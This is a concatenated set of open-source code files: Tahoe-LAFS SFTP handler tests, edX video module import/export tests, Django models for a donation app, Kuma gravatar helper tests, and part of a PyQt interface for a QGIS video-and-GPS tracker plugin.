d.addCallback(lambda ign: _renameFile("loop2", "unknown2"))
d.addCallback(lambda ign: self.root.get(u"unknown2"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
# POSIX-renaming a file to a correct new path should succeed
d.addCallback(lambda ign: _renameFile("unknown2", "new_small"))
d.addCallback(lambda ign: self.root.get(u"new_small"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
# POSIX-renaming a file into a subdirectory should succeed (also tests Unicode names)
d.addCallback(lambda ign: _renameFile(u"gro\u00DF".encode('utf-8'),
u"loop/neue_gro\u00DF".encode('utf-8')))
d.addCallback(lambda ign: self.root.get(u"neue_gro\u00DF"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.gross_uri))
# POSIX-renaming a directory to a correct path should succeed
d.addCallback(lambda ign: _renameFile("tiny_lit_dir", "new_tiny_lit_dir"))
d.addCallback(lambda ign: self.root.get(u"new_tiny_lit_dir"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.tiny_lit_dir_uri))
# POSIX-renaming an unknown to a correct path should succeed
d.addCallback(lambda ign: _renameFile("unknown", "new_unknown"))
d.addCallback(lambda ign: self.root.get(u"new_unknown"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.unknown_uri))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_makeDirectory(self):
d = self._set_up("makeDirectory")
d.addCallback(lambda ign: self._set_up_tree())
# making a directory at a correct path should succeed
d.addCallback(lambda ign: self.handler.makeDirectory("newdir", {'ext_foo': 'bar', 'ctime': 42}))
d.addCallback(lambda ign: self.root.get_child_and_metadata(u"newdir"))
def _got( (child, metadata) ):
self.failUnless(IDirectoryNode.providedBy(child))
self.failUnless(child.is_mutable())
# FIXME
#self.failUnless('ctime' in metadata, metadata)
#self.failUnlessReallyEqual(metadata['ctime'], 42)
#self.failUnless('ext_foo' in metadata, metadata)
#self.failUnlessReallyEqual(metadata['ext_foo'], 'bar')
# TODO: child should be empty
d.addCallback(_got)
# making intermediate directories should also succeed
d.addCallback(lambda ign: self.handler.makeDirectory("newparent/newchild", {}))
d.addCallback(lambda ign: self.root.get(u"newparent"))
def _got_newparent(newparent):
self.failUnless(IDirectoryNode.providedBy(newparent))
self.failUnless(newparent.is_mutable())
return newparent.get(u"newchild")
d.addCallback(_got_newparent)
def _got_newchild(newchild):
self.failUnless(IDirectoryNode.providedBy(newchild))
self.failUnless(newchild.is_mutable())
d.addCallback(_got_newchild)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "makeDirectory invalid UTF-8",
self.handler.makeDirectory, "\xFF", {}))
# should fail because there is an existing file "small"
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "makeDirectory small",
self.handler.makeDirectory, "small", {}))
# directories cannot be created read-only via SFTP
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "makeDirectory newdir2 permissions:0444 denied",
self.handler.makeDirectory, "newdir2",
{'permissions': 0444}))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_execCommand_and_openShell(self):
class MockProtocol:
def __init__(self):
self.output = ""
self.error = ""
self.reason = None
def write(self, data):
return self.outReceived(data)
def outReceived(self, data):
self.output += data
return defer.succeed(None)
def errReceived(self, data):
self.error += data
return defer.succeed(None)
def processEnded(self, reason):
self.reason = reason
return defer.succeed(None)
def _lines_end_in_crlf(s):
return s.replace('\r\n', '').find('\n') == -1 and s.endswith('\r\n')
d = self._set_up("execCommand_and_openShell")
d.addCallback(lambda ign: conch_interfaces.ISession(self.handler))
def _exec_df(session):
protocol = MockProtocol()
d2 = session.execCommand(protocol, "df -P -k /")
d2.addCallback(lambda ign: self.failUnlessIn("1024-blocks", protocol.output))
d2.addCallback(lambda ign: self.failUnless(_lines_end_in_crlf(protocol.output), protocol.output))
d2.addCallback(lambda ign: self.failUnlessEqual(protocol.error, ""))
d2.addCallback(lambda ign: self.failUnless(isinstance(protocol.reason.value, ProcessDone)))
d2.addCallback(lambda ign: session.eofReceived())
d2.addCallback(lambda ign: session.closed())
return d2
d.addCallback(_exec_df)
def _check_unsupported(protocol):
d2 = defer.succeed(None)
d2.addCallback(lambda ign: self.failUnlessEqual(protocol.output, ""))
d2.addCallback(lambda ign: self.failUnlessIn("only the SFTP protocol", protocol.error))
d2.addCallback(lambda ign: self.failUnless(_lines_end_in_crlf(protocol.error), protocol.error))
d2.addCallback(lambda ign: self.failUnless(isinstance(protocol.reason.value, ProcessTerminated)))
d2.addCallback(lambda ign: self.failUnlessEqual(protocol.reason.value.exitCode, 1))
return d2
d.addCallback(lambda ign: conch_interfaces.ISession(self.handler))
def _exec_error(session):
protocol = MockProtocol()
d2 = session.execCommand(protocol, "error")
d2.addCallback(lambda ign: session.windowChanged(None))
d2.addCallback(lambda ign: _check_unsupported(protocol))
d2.addCallback(lambda ign: session.closed())
return d2
d.addCallback(_exec_error)
d.addCallback(lambda ign: conch_interfaces.ISession(self.handler))
def _openShell(session):
protocol = MockProtocol()
d2 = session.openShell(protocol)
d2.addCallback(lambda ign: _check_unsupported(protocol))
d2.addCallback(lambda ign: session.closed())
return d2
d.addCallback(_openShell)
return d
def test_extendedRequest(self):
d = self._set_up("extendedRequest")
d.addCallback(lambda ign: self.handler.extendedRequest("[email protected]", "/"))
def _check(res):
self.failUnless(isinstance(res, str))
self.failUnlessEqual(len(res), 8*11)
d.addCallback(_check)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "extendedRequest foo bar",
self.handler.extendedRequest, "foo", "bar"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "extendedRequest [email protected] invalid 1",
self.handler.extendedRequest, '[email protected]', ''))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "extendedRequest [email protected] invalid 2",
self.handler.extendedRequest, '[email protected]', '\x00\x00\x00\x01'))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "extendedRequest [email protected] invalid 3",
self.handler.extendedRequest, '[email protected]', '\x00\x00\x00\x01_\x00\x00\x00\x01'))
return d
| gpl-2.0 | 8,911,035,432,620,745,000 | 53.041022 | 136 | 0.594233 | false |
pku9104038/edx-platform | common/lib/xmodule/xmodule/tests/test_video.py | 2 | 22009 | # -*- coding: utf-8 -*-
#pylint: disable=W0212
"""Test for Video Xmodule functional logic.
These tests read their data from XML, not from Mongo.
We have a ModuleStoreTestCase class defined in
common/lib/xmodule/xmodule/modulestore/tests/django_utils.py. You can
search for usages of this in the cms and lms tests for examples. You use
this so that it will do things like point the modulestore setting to mongo,
flush the contentstore before and after, load the templates, etc.
You can then use the CourseFactory and XModuleItemFactory as defined
in common/lib/xmodule/xmodule/modulestore/tests/factories.py to create
the course, section, subsection, unit, etc.
"""
import unittest
import datetime
from mock import Mock
from . import LogicTest
from lxml import etree
from xmodule.modulestore import Location
from xmodule.video_module import VideoDescriptor, _create_youtube_string
from .test_import import DummySystem
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from xmodule.tests import get_test_descriptor_system
class VideoModuleTest(LogicTest):
"""Logic tests for Video Xmodule."""
descriptor_class = VideoDescriptor
raw_field_data = {
'data': '<video />'
}
def test_parse_youtube(self):
"""Test parsing old-style Youtube ID strings into a dict."""
youtube_str = '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': 'ZwkTiUPN0mg',
'1.25': 'rsq9auxASqI',
'1.50': 'kMyNdzVHHgg'})
def test_parse_youtube_one_video(self):
"""
Ensure that all keys are present and missing speeds map to the
empty string.
"""
youtube_str = '0.75:jNCf2gIqpeE'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': '',
'1.25': '',
'1.50': ''})
def test_parse_youtube_invalid(self):
"""Ensure that ids that are invalid return an empty dict"""
# invalid id
youtube_str = 'thisisaninvalidid'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
# another invalid id
youtube_str = ',::,:,,'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
# and another one, partially invalid
youtube_str = '0.75_BAD!!!,1.0:AXdE34_U,1.25:KLHF9K_Y,1.5:VO3SxfeD,'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': '',
'1.00': 'AXdE34_U',
'1.25': 'KLHF9K_Y',
'1.50': 'VO3SxfeD'})
def test_parse_youtube_key_format(self):
"""
Make sure that inconsistent speed keys are parsed correctly.
"""
youtube_str = '1.00:p2Q6BrNhdh8'
youtube_str_hack = '1.0:p2Q6BrNhdh8'
self.assertEqual(
VideoDescriptor._parse_youtube(youtube_str),
VideoDescriptor._parse_youtube(youtube_str_hack)
)
def test_parse_youtube_empty(self):
"""
Some courses have empty youtube attributes, so we should handle
that well.
"""
self.assertEqual(
VideoDescriptor._parse_youtube(''),
{'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''}
)
class VideoDescriptorTest(unittest.TestCase):
"""Test for VideoDescriptor"""
def setUp(self):
system = get_test_descriptor_system()
location = Location('i4x://org/course/video/name')
self.descriptor = system.construct_xblock_from_class(
VideoDescriptor,
scope_ids=ScopeIds(None, None, location, location),
field_data=DictFieldData({}),
)
def test_get_context(self):
""""test get_context"""
correct_tabs = [
{
'name': "Basic",
'template': "video/transcripts.html",
'current': True
},
{
'name': 'Advanced',
'template': 'tabs/metadata-edit-tab.html'
}
]
rendered_context = self.descriptor.get_context()
self.assertListEqual(rendered_context['tabs'], correct_tabs)
def test_create_youtube_string(self):
"""
Test that Youtube ID strings are correctly created when writing
back out to XML.
"""
system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
field_data = DictFieldData({'location': location})
descriptor = VideoDescriptor(system, field_data, Mock())
descriptor.youtube_id_0_75 = 'izygArpw-Qo'
descriptor.youtube_id_1_0 = 'p2Q6BrNhdh8'
descriptor.youtube_id_1_25 = '1EeWXzPdhSA'
descriptor.youtube_id_1_5 = 'rABDYkeK0x8'
expected = "0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA,1.50:rABDYkeK0x8"
self.assertEqual(_create_youtube_string(descriptor), expected)
def test_create_youtube_string_missing(self):
"""
Test that Youtube IDs which aren't explicitly set aren't included
in the output string.
"""
system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
field_data = DictFieldData({'location': location})
descriptor = VideoDescriptor(system, field_data, Mock())
descriptor.youtube_id_0_75 = 'izygArpw-Qo'
descriptor.youtube_id_1_0 = 'p2Q6BrNhdh8'
descriptor.youtube_id_1_25 = '1EeWXzPdhSA'
expected = "0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA"
self.assertEqual(_create_youtube_string(descriptor), expected)
class VideoDescriptorImportTestCase(unittest.TestCase):
"""
Make sure that VideoDescriptor can import an old XML-based video correctly.
"""
def assert_attributes_equal(self, video, attrs):
"""
Assert that `video` has the correct attributes. `attrs` is a map
of {metadata_field: value}.
"""
for key, value in attrs.items():
self.assertEquals(getattr(video, key), value)
def test_constructor(self):
sample_xml = '''
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
download_track="true"
download_video="true"
start_time="00:00:01"
end_time="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<source src="http://www.example.com/source.ogg"/>
<track src="http://www.example.com/track"/>
</video>
'''
location = Location(["i4x", "edX", "video", "default",
"SampleProblem1"])
field_data = DictFieldData({
'data': sample_xml,
'location': location
})
system = DummySystem(load_error_modules=True)
descriptor = VideoDescriptor(system, field_data, Mock())
self.assert_attributes_equal(descriptor, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'download_video': True,
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4', 'http://www.example.com/source.ogg'],
'data': ''
})
def test_from_xml(self):
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
download_track="false"
start_time="00:00:01"
download_video="false"
end_time="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': False,
'download_video': False,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
def test_from_xml_missing_attributes(self):
"""
Ensure that attributes have the right values if they aren't
explicitly set in XML.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,1.25:1EeWXzPdhSA"
show_captions="true">
<source src="http://www.example.com/source.mp4"/>
</video>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': '',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': '',
'show_captions': True,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': '',
'download_track': False,
'download_video': False,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
def test_from_xml_no_attributes(self):
"""
Make sure settings are correct if none are explicitly set in XML.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = '<video></video>'
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': '',
'youtube_id_1_0': 'OEoXaMPEzfM',
'youtube_id_1_25': '',
'youtube_id_1_5': '',
'show_captions': True,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': '',
'download_track': False,
'download_video': False,
'html5_sources': [],
'data': ''
})
def test_from_xml_double_quotes(self):
"""
Make sure we can handle the double-quoted string format (which was used for exporting for
a few weeks).
"""
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name=""display_name""
html5_sources="["source_1", "source_2"]"
show_captions="false"
download_video="true"
sub=""html5_subtitles""
track=""http://download_track""
download_track="true"
youtube_id_0_75=""OEoXaMPEzf65""
youtube_id_1_25=""OEoXaMPEzf125""
youtube_id_1_5=""OEoXaMPEzf15""
youtube_id_1_0=""OEoXaMPEzf10""
/>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': 'OEoXaMPEzf65',
'youtube_id_1_0': 'OEoXaMPEzf10',
'youtube_id_1_25': 'OEoXaMPEzf125',
'youtube_id_1_5': 'OEoXaMPEzf15',
'show_captions': False,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': 'http://download_track',
'download_track': True,
'download_video': True,
'html5_sources': ["source_1", "source_2"],
'data': ''
})
def test_from_xml_double_quote_concatenated_youtube(self):
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name="Test Video"
youtube="1.0:"p2Q6BrNhdh8",1.25:"1EeWXzPdhSA"">
</video>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': '',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': '',
'show_captions': True,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': '',
'download_track': False,
'download_video': False,
'html5_sources': [],
'data': ''
})
def test_old_video_format(self):
"""
Test backwards compatibility with VideoModule's XML format.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = """
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
source="http://www.example.com/source.mp4"
from="00:00:01"
to="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
"""
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': '',
})
def test_old_video_data(self):
"""
Ensure that Video is able to read VideoModule's model data.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = """
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
from="00:00:01"
to="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
"""
video = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(video, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
def test_import_with_float_times(self):
"""
        Ensure that Video can import float values for start_time and end_time.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = """
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
from="1.0"
to="60.0">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
"""
video = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(video, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
class VideoExportTestCase(unittest.TestCase):
"""
Make sure that VideoDescriptor can export itself to XML
correctly.
"""
def assertXmlEqual(self, expected, xml):
for attr in ['tag', 'attrib', 'text', 'tail']:
self.assertEqual(getattr(expected, attr), getattr(xml, attr))
for left, right in zip(expected, xml):
self.assertXmlEqual(left, right)
def test_export_to_xml(self):
"""Test that we write the correct XML on export."""
module_system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
desc = VideoDescriptor(module_system, DictFieldData({}), ScopeIds(None, None, location, location))
desc.youtube_id_0_75 = 'izygArpw-Qo'
desc.youtube_id_1_0 = 'p2Q6BrNhdh8'
desc.youtube_id_1_25 = '1EeWXzPdhSA'
desc.youtube_id_1_5 = 'rABDYkeK0x8'
desc.show_captions = False
desc.start_time = datetime.timedelta(seconds=1.0)
desc.end_time = datetime.timedelta(seconds=60)
desc.track = 'http://www.example.com/track'
desc.download_track = True
desc.html5_sources = ['http://www.example.com/source.mp4', 'http://www.example.com/source.ogg']
desc.download_video = True
xml = desc.definition_to_xml(None) # We don't use the `resource_fs` parameter
expected = etree.fromstring('''\
<video url_name="SampleProblem1" start_time="0:00:01" youtube="0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA,1.50:rABDYkeK0x8" show_captions="false" end_time="0:01:00" download_video="true" download_track="true">
<source src="http://www.example.com/source.mp4"/>
<source src="http://www.example.com/source.ogg"/>
<track src="http://www.example.com/track"/>
</video>
''')
self.assertXmlEqual(expected, xml)
def test_export_to_xml_empty_end_time(self):
"""Test that we write the correct XML on export."""
module_system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
desc = VideoDescriptor(module_system, DictFieldData({}), ScopeIds(None, None, location, location))
desc.youtube_id_0_75 = 'izygArpw-Qo'
desc.youtube_id_1_0 = 'p2Q6BrNhdh8'
desc.youtube_id_1_25 = '1EeWXzPdhSA'
desc.youtube_id_1_5 = 'rABDYkeK0x8'
desc.show_captions = False
desc.start_time = datetime.timedelta(seconds=5.0)
desc.end_time = datetime.timedelta(seconds=0.0)
desc.track = 'http://www.example.com/track'
desc.download_track = True
desc.html5_sources = ['http://www.example.com/source.mp4', 'http://www.example.com/source.ogg']
desc.download_video = True
xml = desc.definition_to_xml(None) # We don't use the `resource_fs` parameter
expected = etree.fromstring('''\
<video url_name="SampleProblem1" start_time="0:00:05" youtube="0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA,1.50:rABDYkeK0x8" show_captions="false" download_video="true" download_track="true">
<source src="http://www.example.com/source.mp4"/>
<source src="http://www.example.com/source.ogg"/>
<track src="http://www.example.com/track"/>
</video>
''')
self.assertXmlEqual(expected, xml)
def test_export_to_xml_empty_parameters(self):
"""Test XML export with defaults."""
module_system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
desc = VideoDescriptor(module_system, DictFieldData({}), ScopeIds(None, None, location, location))
xml = desc.definition_to_xml(None)
expected = '<video url_name="SampleProblem1"/>\n'
self.assertEquals(expected, etree.tostring(xml, pretty_print=True))
| agpl-3.0 | -2,360,412,918,190,615,000 | 40.448211 | 226 | 0.556363 | false |
zaffra/Donate | donate/models.py | 1 | 2850 | from django.db import models
from djangotoolbox.fields import ListField
from django.contrib.auth.models import User
class CommonModel(models.Model):
"""
CommonModel contains the common fields most all other
models will use.
"""
# Auto datetime when created
created_datetime = models.DateTimeField(auto_now_add=True)
# Auto updated when models are saved
updated_datetime = models.DateTimeField(auto_now=True)
# Is this model active and usable?
is_active = models.BooleanField(default=True)
class Meta:
# makes this model abstract such that it cannot
# be instantiated into an actual table and only
# useful for model inheritance
abstract = True
class Charity(CommonModel):
"""
A model for storing a Charity.
"""
# charity name
name = models.CharField(max_length=32)
# charity email address
email = models.EmailField()
class Application(CommonModel):
"""
A model for storing a user's Application
"""
# the owner of the application
user = models.ForeignKey(User)
# readable name of the application
name = models.CharField(max_length=32, unique=True)
# unique identifier of the application for URL mapping
slug = models.SlugField(max_length=32, unique=True)
# description of the application
description = models.TextField()
# goal value
goal_value = models.IntegerField()
# unit of the goal value (singular and plural could be
# combined, but I'm taking the easy route and asking
# the user)
goal_units_singular = models.CharField(max_length=32)
goal_units_plural = models.CharField(max_length=32)
# the list of charities supported by the application
charities = ListField()
class Donation(CommonModel):
"""
A model for the donations being made for a particular
application. It tracks the associated application, the
donation amount, and the PayPal payKey for the donation.
Note: Until a donation is complete and successful, the is_active
field will be set to False
"""
# The PayPal payKey associated with this donation. We use
# the payKey to lookup the appropriate donation during all
# PayPal transaction flows.
pay_key = models.CharField(max_length=32)
# The application owning this donation
application = models.ForeignKey(Application)
# The amount of the donation. Handles up to 999.99
amount = models.DecimalField(max_digits=5, decimal_places=2)
class ProgressUpdate(CommonModel):
"""
Used to track the updates to a user's goal. Each instance
will have a date and value associated.
"""
# The application owning this update
application = models.ForeignKey(Application)
# the value of this update set by the owner
value = models.FloatField()
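# Illustrative usage sketch (not part of the original module). The objects and
# field values below, including the PayPal payKey, are hypothetical:
#
#   app = Application.objects.create(
#       user=runner, name="Run for Water", slug="run-for-water",
#       description="Sponsored run", goal_value=100,
#       goal_units_singular="mile", goal_units_plural="miles",
#       charities=[charity.pk])
#   # A donation stays inactive until the PayPal flow completes successfully.
#   donation = Donation.objects.create(
#       application=app, pay_key="AP-FAKE1234", amount="25.00", is_active=False)
#   ProgressUpdate.objects.create(application=app, value=12.5)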
| bsd-3-clause | 7,198,623,145,001,043,000 | 28.081633 | 69 | 0.698947 | false |
cindyyu/kuma | kuma/users/tests/test_helpers.py | 16 | 1105 | import urllib
from hashlib import md5
from django.conf import settings
from nose.tools import eq_, ok_
from . import UserTestCase
from ..helpers import gravatar_url, public_email
class HelperTestCase(UserTestCase):
def setUp(self):
super(HelperTestCase, self).setUp()
self.u = self.user_model.objects.get(username=u'testuser')
def test_default_gravatar(self):
d_param = urllib.urlencode({'d': settings.DEFAULT_AVATAR})
ok_(d_param in gravatar_url(self.u.email),
"Bad default avatar: %s" % gravatar_url(self.u.email))
def test_gravatar_url(self):
self.u.email = '[email protected]'
ok_(md5(self.u.email).hexdigest() in gravatar_url(self.u.email))
def test_public_email(self):
eq_('<span class="email">'
'me@domain.c'
'om</span>', public_email('[email protected]'))
eq_('<span class="email">'
'not.an.emai'
'l</span>', public_email('not.an.email'))
| mpl-2.0 | 7,404,862,897,567,889,000 | 32.484848 | 76 | 0.597285 | false |
sagost/VideoUavTracker | vut_newproject.py | 1 | 8521 | # -*- coding: utf-8 -*-
'''
Video Uav Tracker v 2.0
Replay a video in sync with a gps track displayed on the map.
-------------------
copyright : (C) 2017 by Salvatore Agosta
email : [email protected]
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
INSTRUCTION:
Syncing:
- Create new project
- Select video and .gpx track (1 trkpt per second)
- Identify the first matching video frame / GPS time pair and select it.
- Push Synchronize
- Push Start
Replay:
- Move on map
- Create associated DB shapefile
- Add POI with associated video frame saved
- Extract frames with associated coordinates for rapid photogrammetry use
'''
import sys
import os
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtMultimediaWidgets import QVideoWidget
import resources
class Ui_NewProject(object):
def setupUi(self, NewProject):
NewProject.setObjectName("NewProject")
NewProject.resize(736, 625)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/plugins/Video_UAV_Tracker/icon.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
NewProject.setWindowIcon(icon)
self.gridLayout_2 = QtWidgets.QGridLayout(NewProject)
self.gridLayout_2.setObjectName("gridLayout_2")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.video_frame_2 = QVideoWidget(NewProject)
p = self.video_frame_2.palette()
p.setColor(QtGui.QPalette.Window, QtCore.Qt.black)
self.video_frame_2.setPalette(p)
self.video_frame_2.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.video_frame_2.sizePolicy().hasHeightForWidth())
self.video_frame_2.setSizePolicy(sizePolicy)
self.video_frame_2.setStyleSheet("background-color: rgb(0, 0, 0);")
self.video_frame_2.setObjectName("video_frame_2")
self.horizontalLayout.addWidget(self.video_frame_2)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 15)
self.horizontalSlider = QtWidgets.QSlider(NewProject)
self.horizontalSlider.setOrientation(QtCore.Qt.Horizontal)
self.horizontalSlider.setObjectName("horizontalSlider")
self.gridLayout.addWidget(self.horizontalSlider, 1, 0, 1, 15)
self.replayPlay_pushButton = QtWidgets.QPushButton(NewProject)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.replayPlay_pushButton.sizePolicy().hasHeightForWidth())
self.replayPlay_pushButton.setSizePolicy(sizePolicy)
self.replayPlay_pushButton.setCheckable(False)
self.replayPlay_pushButton.setChecked(False)
self.replayPlay_pushButton.setObjectName("replayPlay_pushButton")
self.gridLayout.addWidget(self.replayPlay_pushButton, 3, 1, 1, 1)
self.replayPosition_label = QtWidgets.QLabel(NewProject)
self.replayPosition_label.setObjectName("replayPosition_label")
self.gridLayout.addWidget(self.replayPosition_label, 3, 4, 1, 1)
self.muteButton = QtWidgets.QToolButton(NewProject)
